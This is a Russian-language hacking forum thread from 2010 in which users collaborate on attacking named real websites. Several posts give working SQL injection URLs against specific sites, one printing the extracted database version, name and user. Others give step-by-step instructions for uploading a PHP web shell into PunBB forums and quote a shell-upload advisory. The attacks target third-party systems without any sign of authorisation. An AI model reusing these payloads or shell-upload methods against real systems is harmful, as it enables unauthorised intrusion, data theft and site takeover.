HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.09.2010, 06:38
SofiaLoar
Новичок
Регистрация: 26.04.2026
Сообщений: 0
С нами: 28659

Репутация: 0
По умолчанию

Походу blind sql

http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+

Выдает то же,что по запросу

http://www.mirdela.ru/news.php?nid=-351

А если что нибудь убрать,выдаст

2Can not select content

Как такую раскрутить?хотя бы версию узнать.
 
Ответить с цитированием

  #2  
Старый 21.09.2010, 10:53
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами: 10889431

Репутация: 34
По умолчанию

Цитата:
Сообщение от Darth Padla  
Darth Padla said:
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.
нет там есть вывод. Версия у тебя 4.1.25-log.

Я особо не вдавался в подробности, поэтому покажу как я на горячую нашёл.

Вот запрос - http://www.mirdela.ru/news.php?nid=351/**/union/**/select/**/version(),version(),version(),version(),version(), version(),version(),version(),version()/*

Сделай поиск по 4.1.25-log И увидишь на странице где идёт вывод.
 
Ответить с цитированием

  #3  
Старый 21.09.2010, 11:02
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Darth Padla  
Darth Padla said:
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.
http://www.mirdela.ru/news.php?nid=351+UNION+SELECT+1,2,AES_DECRYPT%28AE S_ENCRYPT%28CONCAT_WS%280x3a,Version%28%29,Databas e%28%29,User%28%29%29,0x71%29,0x71%29,4,5,6,7,8,9--

Version: 4.1.25-log

Database: nsk24ru0_realty

User: nsk24ru0_realty@localhost

колонок 9 а не 10..order by юзай
 
Ответить с цитированием

  #4  
Старый 21.09.2010, 12:41
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Шелл в punBB, кто знает как?
 
Ответить с цитированием

  #5  
Старый 21.09.2010, 12:49
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
Шелл в punBB, кто знает как?
а какая версия?
 
Ответить с цитированием

  #6  
Старый 21.09.2010, 12:57
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

Заливка шелла в PunBB 1.2.17

admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz

шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)

Цитата:
Сообщение от None  
================================================== =========
PunBB Automatic Image Upload 1.0 Shell Upload Vulnerability
================================================== =========
@Title: PunBB Image Upload 1.0 Shell Upload Vulnerability
@Author: The_Exploited aka l3d aka Spoof
@Mail: spoof@live.it
@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/
@PHP File Bugged: http://mysite.com/punbb/uploadimg.php
@Shellz: Upload the shell to "uploadimg.php"
@Mod Download: http://www.punres.org/download.php?id=1523
@Mod Version: 1.0
@Date: 2010-04-09
 
Ответить с цитированием

  #7  
Старый 21.09.2010, 15:32
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от 547  
Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)
version 1.2.14 ничего похожее на packager там нет... (
 
Ответить с цитированием

  #8  
Старый 21.09.2010, 15:43
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами: 10889431

Репутация: 34
По умолчанию

Цитата:
Сообщение от Gorev  
version 1.2.14 ничего похожее на packager там нет... (
А ты это пробовал ?

http://seclists.org/bugtraq/2007/Apr/174
 
Ответить с цитированием

  #9  
Старый 21.09.2010, 15:56
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от kfor  
А ты это пробовал ?
http://seclists.org/bugtraq/2007/Apr/174
не могу его использовать так как пасс узнал из других источников нежели из базы форума, не знаю префикс..а гадать его долго...
 
Ответить с цитированием

  #10  
Старый 21.09.2010, 18:49
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

ктото с таким сталкивался?

http://www.chinashopunion.com/productinfo.php?id=109+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.